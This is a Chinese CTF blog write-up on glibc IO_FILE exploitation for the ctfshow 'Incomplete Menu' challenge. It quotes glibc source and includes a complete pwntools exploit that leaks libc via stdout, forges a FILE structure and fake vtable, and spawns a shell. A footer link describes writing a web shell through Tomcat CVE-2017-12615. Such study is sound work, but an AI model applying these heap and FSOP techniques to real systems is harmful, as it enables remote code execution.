之前写过一篇 IO_FILE——leak 任意读,但是在学习的时候偷懒了,没有深入去看,这次碰到 winmt 师傅出的题,就傻眼了,故再写一篇博客来记录一下。

例题 ctfshow Incomplete Menu :

洞在 edit 里,可以超过 size 进行一个置零的操作。

这里还是考虑利用 _IO_2_1_stdout_ 来泄露 libc 基址。这里就出现了一个在我上篇文章中忽略的知识点。上一篇文章是通过改 flag 的一系列操作来进行,而 _IO_2_1_stdout_ 还有另一种修改方式可以泄露 libc。及使 _IO_read_end == _IO_write_base,忽略源码在下面:

_IO_size_t

new_do_write (_IO_FILE *fp, const char *data, _IO_size_t to_do)

{

  _IO_size_t count;

  if (fp->_flags & _IO_IS_APPENDING)

    /* On a system without a proper O_APPEND implementation,

       you would need to sys_seek(0, SEEK_END) here, but is

       not needed nor desirable for Unix- or Posix-like systems.

       Instead, just indicate that offset (before and after) is

       unpredictable. */

    fp->_offset = _IO_pos_BAD;

  else if (fp->_IO_read_end != fp->_IO_write_base)

    {

      _IO_off64_t new_pos

    = _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);

      if (new_pos == _IO_pos_BAD)

    return 0;

      fp->_offset = new_pos;

    }

  count = _IO_SYSWRITE (fp, data, to_do);

  if (fp->_cur_column && count)

    fp->_cur_column = _IO_adjust_column (fp->_cur_column - 1, data, count) + 1;

  _IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);

  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_buf_base;

  fp->_IO_write_end = (fp->_mode <= 0

               && (fp->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))

               ? fp->_IO_buf_base : fp->_IO_buf_end);

  return count;

}

还有本题还有不会的地方就是利用 _IO_2_1_stdin_ 进行任意写,走 io 的函数在读取数据时,会先判断缓冲区是否有数据,如果有数据,无论是否满足需要的数量,那么就会走缓冲区直接先取出来用,再从用户处读进缓冲区。故我们不能让 _IO_read_end > _IO_read_ptr

_IO_size_t

_IO_file_xsgetn (_IO_FILE *fp, void *data, _IO_size_t n)

{

  _IO_size_t want, have;

  _IO_ssize_t count;

  char *s = data;

  want = n;

  if (fp->_IO_buf_base == NULL)

    {

      /* Maybe we already have a push back pointer.  */

      if (fp->_IO_save_base != NULL)

    {

      free (fp->_IO_save_base);

      fp->_flags &= ~_IO_IN_BACKUP;

    }

      _IO_doallocbuf (fp);

    }

  while (want > 0)

    {

      have = fp->_IO_read_end - fp->_IO_read_ptr;

      if (want <= have)

    {

      memcpy (s, fp->_IO_read_ptr, want);

      fp->_IO_read_ptr += want;

      want = 0;

    }

      else

    {

      if (have > 0)

        {

          s = __mempcpy (s, fp->_IO_read_ptr, have);

          want -= have;

          fp->_IO_read_ptr += have;

        }

      /* Check for backup and repeat */

      if (_IO_in_backup (fp))

        {

          _IO_switch_to_main_get_area (fp);

          continue;

        }

      /* If we now want less than a buffer, underflow and repeat

         the copy.  Otherwise, _IO_SYSREAD directly to

         the user buffer. */

      if (fp->_IO_buf_base

          && want < (size_t) (fp->_IO_buf_end - fp->_IO_buf_base))

        {

          if (__underflow (fp) == EOF)

        break;

          continue;

        }

      /* These must be set before the sysread as we might longjmp out

         waiting for input. */

      _IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);

      _IO_setp (fp, fp->_IO_buf_base, fp->_IO_buf_base);

      /* Try to maintain alignment: read a whole number of blocks.  */

      count = want;

      if (fp->_IO_buf_base)

        {

          _IO_size_t block_size = fp->_IO_buf_end - fp->_IO_buf_base;

          if (block_size >= 128)

        count -= want % block_size;

        }

      count = _IO_SYSREAD (fp, s, count);

      if (count <= 0)

        {

          if (count == 0)

        fp->_flags |= _IO_EOF_SEEN;

          else

        fp->_flags |= _IO_ERR_SEEN;

          break;

        }

      s += count;

      want -= count;

      if (fp->_offset != _IO_pos_BAD)

        _IO_pos_adjust (fp->_offset, count);

    }

    }

  return n - want;

}

需要注意的是本题是要控制 _IO_read_ptr - _IO_read_end < 16 ,至于为什么,emmm也不是很好说,建议各位自己调试看看。

winmt师傅的exp:

from pwn import *

context(arch='amd64', log_level='debug')

io = process("./pwn")

elf = ELF('./pwn')

libc = ELF("./libc-2.27.so")

def get_IO_str_jumps():

   IO_file_jumps_offset = libc.sym['_IO_file_jumps']

   IO_str_underflow_offset = libc.sym['_IO_str_underflow']

   for ref_offset in libc.search(p64(IO_str_underflow_offset)):

       possible_IO_str_jumps_offset = ref_offset - 0x20

       if possible_IO_str_jumps_offset > IO_file_jumps_offset:

          return possible_IO_str_jumps_offset

def new(size):

    io.sendlineafter(">> ", "1")

    io.sendlineafter(">> ", str(size))

def edit(index, length, content):

    io.sendlineafter(">> ", "2")

    io.sendlineafter(">> ", str(index))

    io.sendlineafter(">> ", str(length))

    io.sendafter(">> ", content)

def new_x(size):

    io.sendline("1")

    sleep(0.1)

    io.sendline(str(size))

def edit_x(index, length, content):

    io.sendline("2")

    sleep(0.1)

    io.sendline(str(index))

    sleep(0.1)

    io.sendline(str(length))

    sleep(0.1)

    io.send(content)

new(0x200000);

edit(0, 0x201000 - 0x10 + libc.sym['_IO_2_1_stdout_'] + 0x10 + 1, '\n')

new_x(0x200000);

edit_x(1, 0x201000 * 2 - 0x10 + libc.sym['_IO_2_1_stdout_'] + 0x20 + 1, '\n')

libc_base = u64(io.recvline()[8:16]) - 0x3ed8b0

success("libc_base:\t" + hex(libc_base))

payload = p64(0)*5 + p64(1) + p64(0) + p64(libc_base + next(libc.search(b'/bin/sh')))

payload = payload.ljust(0xd8, b'\x00') + p64(libc_base + get_IO_str_jumps() - 8)

payload += p64(0) + p64(libc_base + libc.sym['system'])

new(0x200000);

edit(2, 0x201000 * 3 - 0x10 + libc.sym['_IO_2_1_stdin_'] + 0x38 + 1, payload)

payload = p64(0xfbad208b)

payload += p64(libc_base + libc.sym['_IO_list_all'] + 132)

payload += p64(libc_base + libc.sym['_IO_list_all']) * 6

payload += p64(libc_base + libc.sym['_IO_list_all'] + 0x10)

payload = payload.ljust(132, b'\x00') + p64(libc_base - (0x201000 * 3 - 0x10))

io.sendlineafter(">> ", payload)

io.interactive()

此外还有一个通过 stdout 的任意写:

  else if (f->_IO_write_end > f->_IO_write_ptr)

    count = f->_IO_write_end - f->_IO_write_ptr; /* Space available. */

  /* Then fill the buffer. */

  if (count > 0)

    {

      if (count > to_do)

    count = to_do;

      f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);

      s += count;

      to_do -= count;

    }

只需把 _IO_write_ptr 改为想要写入的首地址, _IO_write_end 指向写入地址的结尾(或者大一些)即可。

_IO_2_1_stdin_ 任意写及对 _IO_2_1_stdout_ 任意读的补充的更多相关文章

  1. 用java写一个两个任意长度字符串数字和的算法

    package com.cn.test.string; public class StringTest { public static void main(String[] args) { Strin ...

  2. Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)

    Apache Tomcat 7.0.0~7.0.79 直接发送以下数据包即可在Web根目录写入shell: PUT /1.jsp/ HTTP/1.1 Host: 192.168.49.2:8080 A ...

  3. js模拟栈---进制转化。十进制转任意进制进制,任意进制转十进制

    var Stack = (function(){ var items = new WeakMap(); //先入后出,后入先出 class Stack{ constructor(){ items.se ...

  4. python 用类方法和静态方法实现是追加写文件内容,和读指定行号的内容

    用类方法和静态方法实现:一个是追加写文件一行内容,一个是读指定行号的内容   #coding=utf-8   class handle_file(object):     def __init__(s ...

  5. 怎样写APP计划书-20150313早读课

    我们每天都会收到拥有APP创意的人们的电话和邮件,他们想知道把这样的APP做出来需要多少钱.在Calvium,我们尽可能帮助他们,但有时候 做这样的报价真的很难.询问一款APP的价值,就和询问一条绳子 ...

  6. FFMpeg笔记(一) 使用FFmpeg将任意格式图片转换成任意格式图片

    void SrcToDest(char* pSrc, char* pDest,unsigned int nSrcWidth, unsigned int nSrcHeight, AVPixelForma ...

  7. 对《分享一下自己用c++写的小地图》一文的补充

    在写完上一篇文章后,发现了一个问题: 那就是编写的插件无法实时预览. 在学习了Slate之后,我找到了方法: 重写SynchronizeProperties函数 头文件中添加: #if WITH_ED ...

  8. javascript常用的基础函数或方法——写给新手的我(持续补充)

    1常用基础函数 alert函数:显示一个警告对话框,包括一个OK按钮.这就是传说中的警告框,此框一弹,世界就清静了.举例:   alert("我一旦出现,之前出现的就算了,我屁股后面你们就歇 ...

  9. Linux多线程实践(6) --Posix读写锁解决读者写者问题

    Posix读写锁 int pthread_rwlock_init(pthread_rwlock_t *restrict rwlock, const pthread_rwlockattr_t *rest ...

随机推荐

  1. 常见Web服务器

    常见Web服务器

  2. C# 使用Aspose.Cells 导出Excel

    今天在工作中碰到同事用了一种新型的方式导入excel,在此做个学习记录. 插件:Aspose.Cells 第一步:准备好导出的模板,例子: C#代码: #region 验证数据 if (model = ...

  3. 实现表单input文本框不可编辑的三种方法

    感谢原文作者:青灯夜游 原文链接:https://www.php.cn/div-tutorial-413133.html 目录 问题 实现方式 1.οnfοcus=this.blur() 2.read ...

  4. js null和{}区别

    {}是一个不完全空的对象,因为他的原型链上还有Object呢,而null就是完全空的对象,啥也没有,原型链也没有,所以null instanceof Object === false;[]就更不用说了 ...

  5. ImageMagick转换图片格式

    /usr/bin/convert data/manager/tongji/Html/WebData/images/code0/xingfumima0_1000_0.jpg -colorspace cm ...

  6. 《Effective Python》笔记——第2章 函数

    一.函数出错的时候抛异常,而不要返回None pass 二.闭包 书里的例子不好,参考https://www.cnblogs.com/Lin-Yi/p/7305364.html 在一个外函数中定义了一 ...

  7. puppeteerExamples

    What can I do? Most things that you can do manually in the browser can be done using Puppeteer! Here ...

  8. Windows office2019免费激活,附代码

    office2019地址:链接:https://pan.baidu.com/s/1zPt5U7b0L-bGHl5AOtYs2w提取码:m5ei 新建一个txt,然后把这段代码放进去,然后保存关闭改后缀 ...

  9. 框架02--Iptables实际应用

    目录 Iptables实际应用 一.安装iptables 1. 安装iptables软件包 2. 命令格式 3. 参数 二.iptables动作 三.Iptables基本的条件匹配(协议) 四.-s ...

  10. iptables 的使用 与 模块

    今日内容 Iptables 的使用 模块· 内容详细 一.Iptables 的使用 1.使用前奏 1.安装Iptables [root@m01 ~]# yum install iptables* 2. ...